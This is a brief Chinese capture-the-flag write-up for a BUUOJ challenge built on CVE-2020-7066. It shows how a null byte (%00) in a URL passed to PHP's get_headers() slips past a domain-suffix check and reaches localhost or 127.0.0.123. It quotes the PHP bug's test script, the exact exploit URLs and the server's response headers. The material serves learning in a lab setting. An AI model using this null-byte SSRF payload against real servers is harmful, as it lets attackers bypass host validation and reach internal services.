两天没做题,所以选了一道相对简单的题目。
这题难度不高,主要是考查cve-2020-7066漏洞
Test script:
---------------
<?php
// user input
$_GET['url'] = "http://localhost�.example.com"; #利用方法
$host = parse_url($_GET['url'], PHP_URL_HOST);
if (substr($host, -12) !== '.example.com') {
die();
}
$headers = get_headers($_GET['url']);
var_dump($headers);
Expected result:
----------------
Warning: get_headers() expects parameter 1 to be a valid path, string given in php shell code on line 1
NULL
Actual result:
--------------
headers from http://localhost
题目进去只有一个连接,我们点击链接会跳转到http://5b5cdaed-66b1-4477-83c2-8cb5d2e5972a.node3.buuoj.cn/?url=http://www.ctfhub.com
根据漏洞利用方法访问http://5b5cdaed-66b1-4477-83c2-8cb5d2e5972a.node3.buuoj.cn/?url=http://127.0.0.1%00www.ctfhub.com(%00是�)
能看到
Array
(
[0] => HTTP/1.1 200 OK
[1] => Date: Thu, 09 Jul 2020 15:16:46 GMT
[2] => Server: Apache/2.4.38 (Debian)
[3] => X-Powered-By: PHP/7.3.15
[4] => Tips: Host must be end with '123'
[5] => Vary: Accept-Encoding
[6] => Content-Length: 113
[7] => Connection: close
[8] => Content-Type: text/html; charset=UTF-8
)
提示将host改为123结尾,所以最终payload是http://5b5cdaed-66b1-4477-83c2-8cb5d2e5972a.node3.buuoj.cn/?url=http://127.0.0.123%00www.ctfhub.com
这道题只要知道漏洞和利用方法就没什么难度,算是用来增长见识了。